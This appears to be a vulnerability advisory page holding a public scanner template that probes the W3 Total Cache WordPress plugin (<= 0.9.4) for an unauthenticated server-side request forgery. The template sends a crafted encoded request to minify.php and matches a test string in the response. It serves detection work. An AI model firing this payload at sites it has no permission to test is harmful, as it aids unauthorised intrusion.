w3c-total-cache-ssrf: WordPress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)

Date: 2025-08-01 | Affected software: WordPress W3C Total Cache | PoC: public

Vulnerability description

The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.

PoC code [public]

id: w3c-total-cache-ssrf

info:
  name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)
  author: random_robbie
  severity: medium
  description: |
    The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
  reference:
    - https://wpvulndb.com/vulnerabilities/8644
    - https://klikki.fi/adv/w3_total_cache.html
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,cache,ssrf,wp,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'

    matchers:
      - type: word
        part: body
        words:
          - "NessusFileIncludeTest"
# digest: 490a00463044022053a6573eb35f9f7511f7d368f1b7a08ccaea8ea366abf11bea7dd89810aa6ac302207012ce3d63958f0ac32abda4ebe8f8dff897d791b2b26305fe109c64dbf99936:922c64590222798bb761d5b6d8e72950
